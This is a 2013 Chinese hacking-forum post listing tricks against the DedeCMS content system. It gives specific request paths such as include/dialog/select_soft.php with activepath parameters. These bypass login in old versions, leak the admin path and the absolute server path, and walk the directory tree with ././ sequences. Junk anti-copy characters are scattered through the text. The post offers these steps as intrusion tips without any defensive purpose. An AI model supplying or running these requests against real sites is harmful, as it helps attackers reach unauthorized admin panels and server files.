中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]
作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理! V8 c. s. Y: a% E7 ?% o

5 z+ B, ~  h+ j3 Y员帐号,新版本的就直接转向了后台.
. C  l; E/ d( @! ~
/ A% K0 l/ r4 H+ ]% |+ w2.include/dialog/config.php会爆出后台管理路径
( i0 T& H# X% |3 E  X4 t* ^7 A/ F1 n# U, P, Q: P
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录2 Q. _1 D# |; {5 Q" ?# U

1 A2 Z  p- p+ O& H- Q4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
  V% `" w- L- f1 r
1 T/ ^/ B& ]* F) ^/ ]5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉# R: |/ K( _8 j% e# Z. S! b4 O

8 D3 [9 k8 Z- r- z4 Z5 P9 b到根目录去.不过这些版本的访问地址有些不同.
3 \. N  {$ v* B) t; {& m: S8 F% Q地址为require/dialog/select_soft.php?activepath=/././././././././! [: u4 W4 Y9 L5 x
* p/ h& a) O: t- h0 c, }9 Y
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..; w/ K$ w, |+ ~' V
存在相同问题的文件还有# f. F7 t# H; y$ d' ^8 W
include\dialog\select_images.php
( o4 R* g# H& W" E/ O" R1 Cinclude\dialog\select_media.php
% {- {& l2 J1 {+ D# einclude\dialog\select_templets.php​% X8 l! |" S7 P. R& |& P




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2